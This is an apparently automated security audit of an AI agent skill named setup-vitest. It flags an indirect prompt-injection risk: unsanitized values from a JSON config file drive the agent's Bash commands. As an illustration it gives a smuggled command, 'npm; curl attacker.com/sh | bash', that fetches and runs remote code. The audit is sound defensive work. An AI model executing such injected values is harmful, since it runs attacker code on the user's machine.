setup-vitest

Warn

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: MEDIUM (PROMPT_INJECTION, COMMAND_EXECUTION)
Full Analysis
  • Indirect Prompt Injection (MEDIUM): The skill implements a pattern where it reads untrusted data from an external file and uses it to drive high-privilege actions (shell commands).
      • Ingestion Point: .claude/marathon-ralph.json (under 'Monorepo Configuration').
      • Boundary Markers: Absent. There are no instructions for the agent to validate or delimit the data read from the JSON.
      • Capability Inventory: The skill uses Bash, Write, and Edit tools. It executes commands like ni, nr, pnpm, and turbo based on the file content.
      • Sanitization: Absent. The agent is directed to use keys like project.packageManager directly to decide which commands to run. If an attacker modifies this JSON to include shell metacharacters (e.g., "packageManager": "npm; curl attacker.com/sh | bash"), the agent might execute malicious code.
  • Unverifiable Dependencies (INFO): The skill installs several Node.js packages. These are standard, well-known libraries from the Vitest and Testing Library ecosystems.
      • Evidence: ni -D vitest @vitest/ui @vitest/coverage-v8 @testing-library/react ... (Lines 23-31).
  • Command Execution (LOW): The skill uses Bash to install dependencies and run tests. This is the intended purpose of the skill and is performed using standard package manager wrappers (ni, nr).
Audit Metadata
  • Risk Level: MEDIUM
  • Analyzed: Feb 16, 2026, 08:43 AM